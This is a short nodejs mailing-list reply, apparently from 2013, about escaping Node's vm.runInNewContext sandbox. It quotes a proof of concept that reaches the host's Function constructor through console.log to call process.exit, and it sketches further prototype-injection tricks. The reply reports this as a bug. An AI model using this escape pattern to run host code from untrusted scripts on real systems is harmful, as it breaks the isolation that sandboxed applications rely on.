I'd call this a bug, none of the context is supposed to be shared,
including Function and Object.
On Friday, January 18, 2013 12:15:38 PM UTC-7, Bradley Meck wrote:
>
> Austin: won't go into great detail, but heres a fun little example:
>
> ```javascript
> function exploit() {
> console.log.constructor("process.exit(42)")();
> }
> var result = require('vm').runInNewContext([
> '"use strict";',
> '('+exploit.toString()+')()'
> ].join('\n'), {console:console});
> console.log('I SURVIVED THE STORM!'); // it wont
> ```
>
> Thats pretty trivial and then prototype injection attacks can occur if you
> pass in natives and eventually use say... JSON.stringify if you override
> .toJSON, .toString, .constructor, .valueOf, .__proto__, ...
> Then it gets worse when you do something like say... get a hold of a
> non-strict mode function from a different scope by having it construct lets
> say a continuation callback ...
> Even still... get a hold of some options object that feeds into a secure
> area and set the options to something insecure (at a future point in time
> with lets say Object.defineProperty).
> ...
> it goes on...
> ...
>
--
Job Board: http://jobs.nodejs.org/
Posting guidelines:
https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines
You received this message because you are subscribed to the Google
Groups "nodejs" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/nodejs?hl=en?hl=en
